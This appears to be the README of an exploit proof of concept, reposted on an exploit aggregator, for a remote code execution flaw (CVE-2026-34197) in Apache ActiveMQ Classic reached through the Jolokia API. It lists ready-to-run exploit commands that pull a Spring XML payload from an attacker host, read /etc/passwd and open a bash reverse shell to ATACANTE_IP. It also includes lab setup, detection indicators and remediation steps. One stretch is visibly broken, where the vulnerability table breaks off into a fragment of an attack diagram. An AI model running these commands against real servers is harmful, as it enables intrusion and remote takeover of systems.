Exploit for CVE-2026-34197 CVE-2023-46604 CVE-2024-32114 CVE-2026-34197

Name: Exploit for CVE-2026-34197 CVE-2023-46604 CVE-2024-32114 CVE-2026-34197
Rating: 5 (110 reviews)
2026-04-08 | CVSS 10.0
## https://sploitus.com/exploit?id=2E0523BA-5A5F-59A6-A067-CDA22B5089E8
# CVE-2026-34197 — Apache ActiveMQ RCE vía Jolokia API

## Descripción

CVE-2026-34197 es una vulnerabilidad de ejecución remota de código (RCE) en Apache ActiveMQ Classic que permite a un atacante ejecutar comandos arbitrarios en el sistema operativo del servidor a través de la API Jolokia expuesta en la consola web.

La vulnerabilidad existe desde hace más de 13 años y reside en la interacción entre múltiples componentes: Jolokia (puente HTTP-JMX), los MBeans de ActiveMQ, los conectores de red y el transporte VM.

## Información de la Vulnerabilidad

| Campo | Detalle |
|---|---|
| CVE ID | CVE-2026-34197 |
| Tipo | RCE (Remote Code Execution) |
| CWE | CWE-20 (Validación de entrada incorrecta), CWE-94 (Inyección de código) |
| Versiones afectadas | ActiveMQ Classic |
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ATACANTE/x.xml)  |
   |                                    |
   |                                    |-- Crea broker VM
   |                                    |-- Descarga x.xml
   ||
   |                                    |-- Spring instancia beans
   |                                    |-- Runtime.exec(COMANDO)
   |                                    |
```

## Estructura del Proyecto

```
CVE-2026-34197/
├── README.md              # Este archivo
├── exploit.py             # PoC principal
├── payloads/
│   └── template.xml       # Plantilla del payload Spring XML
├── docker/
│   └── docker-compose.yml # Entorno de laboratorio vulnerable
└── LICENSE
```

## Requisitos

- Python 3.8+
- Módulos: `requests`, `http.server`, `argparse` (stdlib)
- Acceso de red al puerto 8161 del objetivo
- Docker y Docker Compose (opcional, para el laboratorio)

```bash
pip install requests
```

## Uso

### 1. Levantar el entorno vulnerable (opcional)

```bash
cd docker
docker-compose up -d
```

Esto levanta un ActiveMQ Classic 5.18.6 vulnerable en `localhost:8161`.

### 2. Ejecutar el exploit

```bash
# Uso básico con credenciales por defecto
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id"

# Especificar credenciales
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "whoami" -u admin -p admin

# Especificar puerto del servidor HTTP del payload
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -lp 9999 -c "cat /etc/passwd"

# Modo sin autenticación (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id" --no-auth

# Shell reversa
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "bash -i >& /dev/tcp/ATACANTE_IP/4444 0>&1"
```

### Parámetros

| Parámetro | Descripción |
|---|---|
| `-t, --target` | URL base del objetivo (ej: `http://10.0.0.1:8161`) |
| `-l, --lhost` | IP del atacante para servir el payload XML |
| `-lp, --lport` | Puerto del servidor HTTP local (por defecto: 8888) |
| `-c, --command` | Comando a ejecutar en el objetivo |
| `-u, --user` | Usuario (por defecto: `admin`) |
| `-p, --password` | Contraseña (por defecto: `admin`) |
| `--no-auth` | No enviar credenciales (para versiones 6.0.0 - 6.1.1) |
| `--broker-name` | Nombre del broker (por defecto: `localhost`) |

## Detección

Indicadores en los logs del broker ActiveMQ:

```
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
```

Otros indicadores:
- Peticiones POST a `/api/jolokia/` con `addNetworkConnector` en el cuerpo
- Conexiones HTTP salientes desde el proceso de ActiveMQ a hosts inesperados
- Procesos hijos inesperados generados por el proceso Java de ActiveMQ

## Remediación

- Actualizar a ActiveMQ Classic 5.19.4 o 6.2.3
- Cambiar las credenciales por defecto de la consola web
- Restringir el acceso de red al puerto 8161
- Monitorear los logs del broker en busca de URIs `vm://` con `brokerConfig=xbean:http`

## Referencias

- [NVD — CVE-2026-34197](https://nvd.nist.gov/vuln/detail/CVE-2026-34197)
- [Horizon3 — Análisis técnico](https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/)
- [Apache ActiveMQ — Aviso de seguridad](https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt)
- [CVE-2024-32114 — Jolokia sin autenticación](https://nvd.nist.gov/vuln/detail/CVE-2024-32114)
- [CVE-2023-46604 — RCE OpenWire (CISA KEV)](https://nvd.nist.gov/vuln/detail/CVE-2023-46604)

## Autor

Creado por [KONDOR DEV SECURITY](https://t.me/KONDORDEVSECURITY)

[![Telegram](https://img.shields.io/badge/Telegram-KONDORDEVSECURITY-blue?logo=telegram)](https://t.me/KONDORDEVSECURITY)

## Aviso Legal

Este PoC se proporciona exclusivamente con fines educativos y de investigación en seguridad. El uso de esta herramienta contra sistemas sin autorización explícita es ilegal. El autor no se hace responsable del uso indebido de esta herramienta.

## Licencia

MIT — Copyright (c) 2026 [KONDOR DEV SECURITY](https://t.me/KONDORDEVSECURITY)